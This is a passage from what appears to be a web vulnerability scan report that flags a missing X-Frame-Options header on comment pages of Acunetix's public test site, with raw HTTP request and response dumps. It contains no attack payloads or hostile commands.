style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=2
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14397
Response Body - size: 14,397 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKShEjjcO8QZ+TqRo3QvanE8jv9G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a> <DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=3
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBI1RRJ3EGUKdWdAQOQ9gMGQKbUn7" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a> <DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a 